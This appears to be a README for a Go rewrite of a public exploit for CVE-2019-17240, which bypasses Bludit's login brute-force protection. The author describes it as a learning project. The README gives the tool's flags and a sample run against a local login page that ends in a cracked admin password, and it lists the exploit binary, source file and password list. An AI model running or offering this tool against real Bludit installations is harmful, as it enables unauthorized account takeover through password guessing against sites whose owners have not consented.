## Bludit <= 3.9.22 - Bruteforce Mitigation Bypass
This is small project where I rewrite [this python script](https://www.exploit-db.com/exploits/48942) into golang. Purpose of this project was to learn Golang and understand how this exploit work.
### Usage
```bash
$ ./brutepass -sdasds
flag provided but not defined: -sdasds
Usage of ./brutepass:
-c int
Threads (default 5) (default 5)
-l string
Hostname eg... http://127.0.0.1/admin/login.php
-p string
Password file
-u string
Enter username
```
Except threads flag all other flags are mandantory.
```bash
$ ./cve-2019-17240 -p pass.txt -u admin -l "http://127.0.0.1/admin/login.php"
Total requests sent: 10
Total requests sent: 20
Total requests sent: 30
Total requests sent: 40
Total requests sent: 50
Total requests sent: 60
Total requests sent: 65
==========Password Cracked=============
Password: Password
```
[4.0K] /data/pocs/7818eb96a1437f3e23442a6b5c2ba998078c226f
├── [6.4M] cve-2019-17240
├── [2.7K] cve-2019-17240.go
├── [1.3K] pass.txt
└── [ 986] README.md
0 directories, 4 files